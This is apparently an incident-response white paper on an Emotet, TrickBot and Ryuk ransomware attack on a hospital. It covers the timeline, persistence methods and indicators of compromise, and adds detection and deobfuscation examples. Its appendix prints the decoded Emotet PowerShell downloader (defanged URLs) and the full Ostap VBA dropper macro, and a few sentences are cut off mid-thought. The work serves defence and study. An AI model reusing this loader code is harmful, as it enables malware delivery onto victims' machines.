Ransomware Attack Analysis

Introduction

The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight into protecting against and responding to incidents. In this paper, we explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security (Ingalls). Victim organization and employee names have been changed to protect the identity of the organization that engaged Ingalls to respond. While not all components of the investigation are included in this paper, it focuses on the TTPs and Indicators of Compromise to provide an understanding of the attack chain that similar organizations face on a daily basis.

Our investigation methodology is fairly straightforward: identify Indicators or Evidence of Compromise (IOCs and EOCs) via computer forensic evidence, then search all available data records for additional evidence. Ingalls analyzed netflow logs as well as Endpoint Detection & Response (EDR) data from CylancePROTECT and Optics. In addition, Microsoft Exchange server logs, Windows event logs, and SQL server trace logs were reviewed during this effort. IOCs were also searched against various Open Source Intelligence (OSINT) sources to gather additional insight.


Emotet is a banking trojan with the ability to self-propagate, first discovered by researchers in 2014, and it has been continually upgraded and significantly improved since then. Emotet initially functioned as an information stealer; today its customizable modules, popularity in Malware-as-a-Service (MaaS) operations, and ability to send information to and receive commands from Command and Control (C2) servers provide capabilities that criminal groups use to deliver other trojans, information stealers, and ransomware payloads. Initially, Emotet was sent as a malicious email attachment that leveraged Visual Basic macros to execute obfuscated PowerShell scripts. More recently it has also been deployed through other means, such as Remote Desktop Protocol (RDP) brute force attacks.


The TrickBot information stealer, first seen in 2016, is another common MaaS banking trojan. While TrickBot is sometimes spread independently via malicious emails, RDP brute force attacks, and drive-by downloads, it is often deployed as a secondary infection by other trojans such as Emotet. TrickBot is particularly effective at harvesting network credentials, computer credentials, website credentials from browsers, WiFi passwords, VPN credentials and configuration, and cryptocurrency wallet information, and, like Emotet, TrickBot has customizable modules, self-propagation capabilities, and the ability to communicate via C2 servers.


Ryuk, first seen in 2018, is a ransomware variant that extorts victims by encrypting their files and demanding a Bitcoin payment as ransom to decrypt them. Ryuk is another component of the MaaS ecosystem and is frequently deployed by Emotet and TrickBot. It is believed that the Hermes banking trojan developers are also responsible for Ryuk, and that this team is sponsored by North Korea.


Ostap is a JScript trojan downloader. Similar to Emotet, it is often spread via VBA macros in malicious email attachments. Ostap has capabilities that include disabling antivirus or security software and propagating by copying itself to other documents accessible from a compromised host, including network shares. One key difference from Emotet is that Ostap uses JScript to infect a host rather than obfuscated PowerShell scripts. Ostap is commonly used to deploy other trojans, including TrickBot.

Emotet – The Initial Infection

Initial Infection Mechanism - Spearphishing Email

Day 0 - 12:18:48 CST

Jane Buck, an employee at John Doe Memorial Hospital (JDMH), received a spearphishing email at her JDMH email address. The subject line of the email was "Jane Buck - JDMH". The content of the message read "SOC report 01/16/2020" and was signed by "Fawn, Jill" and "Jill.Fawn@StagMedicalCenter.org".

Figure 1 - Spearphishing Email

Jill Fawn is actually an employee at Stag Medical Center, another nearby hospital, but the address in the email "from" field was not Jill Fawn's email address. Rather, the email actually came from saad.alam@ziaudinhospital.com, a known Emotet sender email address.

Figure 2 - Known Emotet Sender OSINT - https://pastebin.com/xFTyBF34

The email contained an attachment named "QZ-2572 Medical report p2.doc". The email originated from the IP address 181.113.134[.]226, an Ecuadorian IP address that is a VPN endpoint.

Figure 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/

The ziauddinhospital.com email server did not have a PTR record configured to allow SMTP reverse DNS resolution, so mail claiming to come from that server could be spoofed. In other words, ziauddinhospital.com did not actually resolve to 181.113.134[.]226. Rather, it should have resolved to

Emotet Downloader

Day 0 - 13:11:27 CST

Jane Buck opened the email attachment. The document contained a VBA macro in its Document_Open event handler (which "Runs when the Word or Publisher document is opened"), so opening the file launched a base64-encoded PowerShell script in a hidden window.

Figure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell Script

This script reaches out to download 796.exe from the following URLs:

  • hxxp://ajhmanamlak[.]com/wp-content/rcz9/ (46.4.213[.]201)
  • hxxp://maphagroup[.]com/wp-admin/mtq/ (194.5.188[.]11)
  • hxxp://www.meggie-jp[.]com/images/Tznj/ (47.245.59[.]74)
  • hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/ (45.124.87[.]127)
  • hxxps://nnjastudio[.]com/wp-admin/xHjsw/ (104.18.58[.]143)

The file 796.exe, an Emotet executable, is downloaded, named publishmsp.exe, and executed by the script. This file then downloads and installs the Emotet module nonsensor.exe to the c:\windows\syswow64\ directory and registers nonsensor.exe as a service (HKLM\system\controlset001\services\nonsensor). The Emotet service then established connectivity with the IP address 100.6.23[.]40, an active Emotet Epoch 2 command and control (C2) server. Once this foothold was established, Emotet, TrickBot, and Ryuk began deploying throughout JDMH's network environment. In addition to the initial infection files, the attackers also dropped several variants of Emotet, TrickBot, and Ryuk into JDMH's environment.


Once the attackers had access to the victim environment, they spent the next 24 hours staging their attack. After enumerating the victim network, Emotet, TrickBot, and Ryuk were propagated to various locations on victim machines, including C:\Users\Default\AppData\Roaming\WinNetCore\, C:\Users\Public\Junk\, C:\Windows\Temp\bdcore_tmp\, C:\ProgramData\, C:\Temp\, C:\Users\User\Public\, and the Recycle Bin (a common location malware uses to hide itself). Emotet and TrickBot are well known for their ability to propagate by enumerating network resources, brute forcing user accounts, and writing to shared drives. One of the novel methods used to propagate the malicious payloads in JDMH's environment was Active Directory startup, shutdown, logon, and logoff Group Policy scripts.


Deploying via Active Directory Group Policy scripts was likely intended as both a propagation method and a persistence mechanism. However, quick action in isolating infected devices and restoring servers from clean backups prevented the attackers from relying on this as an ongoing persistence mechanism.

Figure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence Mechanism

The attackers also used scheduled tasks to achieve persistence. Specifically, they created a scheduled task named "Windows Net Core" on compromised machines to re-infect them with TrickBot, and scheduled tasks named "comp_sys", "comp_sys.h", "user_userlogon" and "user_userlogon_h" on compromised machines to re-infect them with Emotet.

Another, more complicated persistence mechanism was also demonstrated in the attack. JDMH used BitDefender Endpoint Security, deployed via a remote management and monitoring (RMM) tool, to secure their endpoints from malware. Unfortunately, BitDefender was unable to prevent Emotet, TrickBot, or Ryuk from infecting the environment. To make matters worse, the attackers exploited CVE-2019-17099, a vulnerability in BitDefender Endpoint Security versions and prior, to perform a DLL hijack in order to achieve persistence. This vulnerability allows an attacker to load an arbitrary DLL file from the search path, re-infecting compromised computers with Ryuk. Cylance Optics provided insight into the Ryuk detections and showed that the Ryuk encryptor file was being reloaded on victim machines every time the EPSecurityService.exe service was executed.

Figure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence Mechanism
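The scheduled task names, the nonsensor service, the staging directories, and the EPSecurityService.exe DLL reload described above can be turned into simple detection logic over endpoint telemetry. The Python below is an added example, not code from the paper or from any vendor's product; the EDR-style event records, the DLL file names, and the BitDefender install path it checks against are constructed assumptions.

```python
# Indicators taken from the incident narrative; everything else is constructed.
TASK_NAMES = {"windows net core", "comp_sys", "comp_sys.h",
              "user_userlogon", "user_userlogon_h"}   # TrickBot / Emotet re-infection tasks
SERVICE_NAMES = {"nonsensor"}                         # Emotet module installed as a service
STAGING_DIRS = [r"C:\Users\Default\AppData\Roaming\WinNetCore", r"C:\Users\Public\Junk",
                r"C:\Windows\Temp\bdcore_tmp", r"C:\ProgramData", r"C:\Temp",
                r"C:\Users\User\Public"]
VENDOR_DIR = r"C:\Program Files\Bitdefender"          # assumed install root (placeholder)
EXEC_TYPES = {"task_create", "service_install", "process_start", "image_load"}

def in_staging_dir(path: str) -> bool:
    p = path.lower()
    return any(p.startswith(d.lower() + "\\") for d in STAGING_DIRS)

def evaluate(event: dict) -> list:
    """Return (rule, detail) hits for one event; several rules may fire at once."""
    etype, name, path = event["type"], event.get("name", ""), event.get("path", "")
    hits = []
    if etype == "task_create" and name.lower() in TASK_NAMES:
        hits.append(("known_task_name", name))
    if etype == "service_install" and name.lower() in SERVICE_NAMES:
        hits.append(("known_service_name", name))
    # CVE-2019-17099 abuse: EPSecurityService.exe loading a DLL from outside the
    # vendor's own directory is how Ryuk was reloaded on every service start.
    if (etype == "image_load" and name.lower() == "epsecurityservice.exe"
            and not path.lower().startswith(VENDOR_DIR.lower() + "\\")):
        hits.append(("epsecurityservice_foreign_dll", path))
    # Payloads were staged in these directories; anything executed or loaded
    # from them deserves a look (C:\ProgramData is noisy, so triage by path).
    if etype in EXEC_TYPES and in_staging_dir(path):
        hits.append(("staging_dir_execution", path))
    return hits

def scan(events: list) -> list:
    return [(e["host"], rule, detail) for e in events for rule, detail in evaluate(e)]

EVENTS = [  # constructed sample telemetry, not data from the incident
    {"host": "ws01", "type": "task_create", "name": "Windows Net Core",
     "path": r"C:\Users\Default\AppData\Roaming\WinNetCore\core.exe"},
    {"host": "ws01", "type": "task_create", "name": "Nightly Backup",
     "path": r"C:\Program Files\Backup\run.exe"},
    {"host": "srv02", "type": "service_install", "name": "nonsensor",
     "path": r"C:\Windows\SysWOW64\nonsensor.exe"},
    {"host": "ws07", "type": "image_load", "name": "EPSecurityService.exe",
     "path": r"C:\Windows\Temp\bdcore_tmp\hijacked.dll"},   # DLL name is a placeholder
    {"host": "ws07", "type": "image_load", "name": "EPSecurityService.exe",
     "path": r"C:\Program Files\Bitdefender\Endpoint Security\vendor.dll"},
    {"host": "ws05", "type": "process_start", "name": "publishmsp.exe",
     "path": r"C:\Users\Public\Junk\publishmsp.exe"},
]

if __name__ == "__main__":
    for host, rule, detail in scan(EVENTS):
        print(f"{host}: {rule} -> {detail}")
```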


Day 1 - Shortly after 13:00:00 CST

The attackers began infecting computers with Ryuk ransomware. JDMH IT contacted their managed service provider (MSP) for assistance. JDMH's MSP immediately began isolating infected devices, gathering information to establish the scope of the ransomware infection, and bringing up backups of infected servers. Ryuk deleted Volume Shadow data and disabled the Volume Shadow Service on infected computers. The ryukreadme.html file gave the email address to contact the attackers as orfhissipmay1970@protonmail[.]com.

Secondary Infection Attempt - Day 28

Beginning at 11:25 CST, a JDMH user's credentials were used to send 3 emails from 37.221.113[.]166, a datacenter IP address in England. These credentials were presumably harvested by TrickBot during the initial attack, and were used either in a second attempt to infect JDMH's environment or, possibly, after being purchased on a Dark Web forum by a different attacker. The victim had not yet completed a global password reset, which meant that the attacker could use this account to gain access to the Cloud-based email service. This secondary infection attempt underscores the importance and urgency of a timely global password reset following a credential harvesting or information stealing attack.

These emails were sent to a JDMH group email account, a JDMH distribution list of all department managers, and a JDMH distribution list of all JDMH users. The subject of the first email was "Notification statement for written contract No.30449", and the body of the email claimed that the recipient had "missed obligatory compensation for 1481.67 US Dollars date" and contained a malicious document named "cl_inf_HC_163_86818.doc". The subject of the second email was "Second claim for written contract No.64312", and the body of the email claimed that the recipient had "dropped obligatory payment for 3152.98 US Dollars date" and contained a malicious document named "paym_req_EC_642_77095.doc". The subject of the third email was "Resended claim for contract No.81253", and the body of the email claimed that the recipient had "missed obligatory compensation for 1255.43 US Dollars date" and contained a malicious document named "iss_cont_DT_174_23992.doc".

Figure 7 - Secondary Infection Attempt 1

Figure 8 - Secondary Infection Attempt 2

Figure 9 - Secondary Infection Attempt 3

All three malicious documents contain Ostap malware, using the same malicious VBA macro, which loads a malicious JavaScript file named "Dsaow.GaerIok.jse". If the Ostap file fails to download its payload, it attempts to replace other Office documents on attached drives and network shares with itself. When run from Microsoft Word 2010 the macro does not fully execute, but when run from Microsoft Word 2016 it infects the host with TrickBot. The file then contacts ipecho.net (probably to check the victim's external IP address), cbl.abuseat.org, and zen.spamhaus.org. It also attempts to connect to hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php to report the victim computer's name, user name, IP address, and network adapter information to the attacker. 185.180.199[.]77 is a known Ostap and TrickBot host located in the Netherlands. The TrickBot malware then attempts to establish connectivity with, and download the systeminfo, msconfig, and pwgrab modules from, one of the following C2 servers:

Figure 10 - C2 Servers

Fortunately, JDMH's environment was successfully contained, and JDMH IT staff quickly noticed and responded to the emails, securing the compromised account and informing users not to open the email if they received it.

Dark Web Forum - JDMH Credentials for Sale

A list of JDMH computer names and user credentials was found for sale in a Dark Web forum. These were likely the result of TrickBot harvesting credentials within the environment. Fortunately, these were outdated computer names and credentials that had been subject to a global password reset during remediation efforts. While JDMH has taken steps to further secure their environment with a defense in depth approach, the attackers still persist in their efforts to extort money through ransomware attacks.

Post-Incident Activity

JDMH received a thorough report detailing the timeline of the attack and analysis of malicious files and activity within their environment. This report was briefed to their IT staff, MSP representatives, executive leadership, and legal counsel. Ingalls provided JDMH with recommendations for thoroughly eradicating malware and persistence mechanisms and for securing their IT environment and user accounts. JDMH also signed up for Ingalls' Managed Detection and Response (MDR) service as an ongoing component of their defense in depth strategy. Doing so was simple because Ingalls had already deployed their MDR hardware and software into JDMH's environment for the incident response efforts.

Indicators of Compromise

File IOCs

Network IOCs

Email Address IOCs

Malicious Script IOCs

QZ-2572 Medical report p2.doc


This Base64 string decodes as:

$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')
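The downloader's obfuscation (backtick-split method names, concatenated string fragments, and decoy variable assignments) can be stripped mechanically to recover the payload URLs and the size check that gates execution. The Python below is an added analysis example, not code from the paper; it embeds a defanged (hxxp, [.]) copy of the decoded script above as its only input and runs offline.

```python
import re

# Constructed copy of the decoded, defanged Emotet downloader quoted on this
# page, used here only as analysis input; it is never executed.
SAMPLE = (
    "$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';"
    "$Ibluqjxnvox=$env:userprofile+'\\'+$Dcdxsjdnbe+'.exe';"
    "$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;"
    "$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*"
    "hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*"
    "hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*"
    "hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'.\"SPl`IT\"('*');"
    "$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{"
    "$Zgkvhhmc.\"DoWnL`O`AdFIle\"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';"
    "If ((&('G'+'et'+'-Item') $Ibluqjxnvox).\"LeN`gTH\" -ge 33113) "
    "{[Diagnostics.Process]::\"sTA`Rt\"($Ibluqjxnvox);break}}catch{}}"
    "$Qniqrcmlj='Opecclspsu'"
)

def deobfuscate(script: str) -> str:
    """Undo the obfuscation tricks used by this downloader, in order."""
    # 1. A backtick inside a double-quoted string is PowerShell's escape char;
    #    before a letter that is not a real escape it is a no-op, so
    #    "DoWnL`O`AdFIle" is just DownloadFile split up to defeat matching.
    s = re.sub(r"`(?![ntr0abfv])", "", script)
    # 2. Member and cmdlet names are case-insensitive; normalise quoted member
    #    names such as ."SPlIT" and ::"sTARt" to .split and ::start.
    s = re.sub(r'([.:]{1,2})"(\w+)"', lambda m: m.group(1) + m.group(2).lower(), s)
    # 3. Re-join 'ne'+'w-obje'+'ct' style fragments, then drop the .( ) and
    #    &( ) invocation wrappers around the resulting cmdlet names.
    joined = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != s:
        prev, s = s, joined.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    s = re.sub(r"[.&]\('([^']+)'\)", r"\1", s)
    # 4. Remove decoy assignments: string variables referenced exactly once.
    for name in re.findall(r"\$(\w+)\s*=\s*'[^']*'(?:;|$)", s):
        if s.count("$" + name) == 1:
            s = re.sub(r"\$" + name + r"\s*=\s*'[^']*'(?:;|$)", "", s)
    return s

def extract_iocs(script: str) -> dict:
    """Pull the payload URLs and the minimum-size gate from the cleaned script."""
    s = deobfuscate(script)
    size = re.search(r"\.length\s+-ge\s+(\d+)", s)
    return {
        "urls": re.findall(r"hxxps?://[^'*\s]+", s),
        "min_size": int(size.group(1)) if size else None,
        "cleaned": s,
    }

if __name__ == "__main__":
    result = extract_iocs(SAMPLE)
    print(result["cleaned"])
    for url in result["urls"]:
        print("payload URL:", url)
    print("payload only runs if downloaded size >=", result["min_size"])
```

The size check explains why a sinkholed or dead URL does not execute anything: the loop only starts the file once one download returns at least 33113 bytes.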

cl_inf_HC_163_86818.doc, paym_req_EC_642_77095.doc, and iss_cont_DT_174_23992.doc VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Moon, 0, 0, MSTSCLib, MsRdpClient8NotSafeForScripting"

Private Kirfool As String

Sub RePac()
If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
End Sub

Private Function Herdio(i As String) As String

Herdio = Replace(i, "a", "")
End Function

Function Mulent(parr As Variant, psiz As Integer, pbl As Integer, prow As Integer, pcol As Integer, pbit As Integer, dc As Long) As Boolean
Dim ix%, va%, r%, c%, s%
r = prow
c = pcol
If psiz > 0 Then
s = psiz / pbl
If r < 0 Then
r = r + psiz
c = c + 4 - ((psiz + 4) Mod 8)
End If
If c < 0 Then
c = c + psiz
r = r + 4 - ((psiz + 4) Mod 8)
End If
If c >= psiz Then
c = c - psiz
r = r + 1
End If
r = r + (Int(r / s) * 2)
c = c + (Int(c / s) * 2)
End If
Mulent = False
r = r + 2
c = c + 2
ix = r * 20 + Int(c / 8) ' 20 bytes per row
If ix > 5 Or ix < 0 Then GoTo Dro
' c = 2^(7 - (c MOD 8))
c = 2 ^ (c Mod 8)
va = parr(0, ix)
If psiz > 0 Then
If (Int(va / c) Mod 2) = 0 Then
If pbit < 0 Then
Mulent = True
GoTo Dro
End If
parr(0, ix) = va + c
GoTo Dro
End If
End If
If pbit > 0 Then
va = parr(1, ix)
If (Int(va / c) Mod 2) = 0 Then va = va + c ' else va = va - c
parr(1, ix) = va
End If
Kirfool = """" + Kirfool + """"
ActiveDocument.TrackRevisions = CallByName(CreateObject(Herdio("WaSacripata.Sahelala")), Herdio("Ruana"), (dc - dc) + 1, Kirfool, (dc - dc) + 1)
Mulent = True
End Function

Private Function Molert(i As String) As String
Molert = Replace(i, "y", "")
End Function

Private Sub Branolp()
Dim butilop As String
Dim xShape As Shape, xBkgr As Shape
Dim xAddr As String
Dim xPosOldX As Double, xPosOldY As Double
Dim xSizeOldW As Double, xSizeOldH As Double
butilop = Me.Content.Text
Kirfool = Application.StartupPath & Herdio(Molert("yo\.aay.\a.y.\yya")) & Molert("Dsaoyyyw.GayyyerIok.")
Dim Ikolpppp7 As Integer
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Ikolpppp7 = FreeFile
Open Kirfool For Binary Lock Read Write As #Ikolpppp7
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Put #Ikolpppp7, , butilop
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Close #Ikolpppp7
FileCopy Kirfool, Kirfool & Molert("yjysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
Kill Kirfool
Kirfool = Kirfool & Molert("yjyysye")
If TypeName(Application.Caption) <> "to hui" Then
Debug.Print "to hui"
End If
End Sub

Private Sub Moon_OnDisconnected(ByVal discReason As Long)
If (Mulent(Array(7, 8, 6), 0, 0, 0, 0, 0, discReason)) Then
End If
End Sub

Private Sub Document_ContentControlOnExit(ByVal ContentControl As ContentControl, Cancel As Boolean)
Debug.Print "to hui"
End Sub



About the Author
Cyrus Robinson, CISSP, MCSE, MCITP, CEH, CHFI, Sec+
Mr. Robinson is a skilled Information Security professional with experience working with diversified technologies and environments. Mr. Robinson’s professional IT career began as an electronic forensics engineer as an active duty Airman with primary responsibilities with testing and evaluating digital forensic software, policies, and procedures. In this capacity, he worked alongside federal investigators and various DoD, CIA, FBI, NSA, and NIST employees. Following his active duty role with the USAF, Mr. Robinson went on to work in change management and system administration as a DoD Contractor. Mr. Robinson also has extensive experience in the roles of Information Security Officer and IT Director for a large medical group which contribute to his knowledge with security risk assessments, HIPAA compliance, and drafting and implementing corporate IT security and business continuity policies. Mr. Robinson holds various industry standard certifications and a Masters of Science in Information Security and Assurance.